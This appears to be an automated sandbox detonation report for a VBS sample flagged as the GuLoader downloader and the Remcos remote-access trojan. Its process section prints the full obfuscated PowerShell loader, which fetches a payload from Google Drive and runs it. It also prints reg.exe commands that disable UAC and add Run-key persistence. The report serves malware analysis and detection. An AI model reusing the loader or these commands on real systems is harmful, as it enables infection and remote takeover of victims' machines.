memory/1068-297-0x00000000025A0000-0x00000000025E0000-memory.dmp

memory/1068-298-0x0000000006030000-0x0000000006130000-memory.dmp

memory/1068-299-0x0000000005210000-0x0000000005211000-memory.dmp

memory/1068-300-0x00000000063C0000-0x000000000A068000-memory.dmp

memory/1068-302-0x00000000773D0000-0x0000000077579000-memory.dmp

memory/1068-303-0x00000000025A0000-0x00000000025E0000-memory.dmp

memory/1068-304-0x0000000006030000-0x0000000006130000-memory.dmp

memory/1068-305-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/2728-306-0x00000000773D0000-0x0000000077579000-memory.dmp

memory/2728-307-0x00000000775F6000-0x00000000775F7000-memory.dmp

memory/2728-308-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/2728-309-0x00000000006E0000-0x0000000001742000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d875d17376dda9ceac84390a9755b6a
SHA1 c6dec0d91fa6d064125ea88e1b517f62a4b3b73a
SHA256 5f531025129209b1aea31a92b922752189c03fbf832f46832cf173dc49b9ff97
SHA512 946e4e18ab47a7c29d2a5bc00d7486eda9aeb350b78cb37738b275f6fca217a1c9e81829ec3cba978724a92bf3cac981820c65d5dfcf8485e89963dc2fb03710

C:\Users\Admin\AppData\Local\Temp\Tar4FD6.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/2728-332-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/2728-333-0x0000000001750000-0x00000000053F8000-memory.dmp

memory/1068-335-0x0000000073410000-0x00000000739BB000-memory.dmp

memory/2728-336-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/2288-337-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-28 02:03

Reported

2024-03-28 02:05

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 540 set thread context of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4492 wrote to memory of 2412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 4760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 3bb192572878028a805ba6cbb1c46538
SHA1 883d9e6730b0288d09742546aa64e0dc5ba6ab26
SHA256 14d1ba8a498795b848ecd5bd316d8df4cb6f4278609aab1caf353346f1d6fb43
SHA512 59b62ecc81033693a5bb6970f54a1564968136daa05d9e46c5fa26cb94d56fff23fb5f45ec3d9cc627b0a5d2255f679be2361cf684675d3548deac660fa40a7c

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 0ba3f0fb7f22ed631bc2d704810afdb6
SHA1 160465127007737cb73903e8967bb9c545bd9c5e
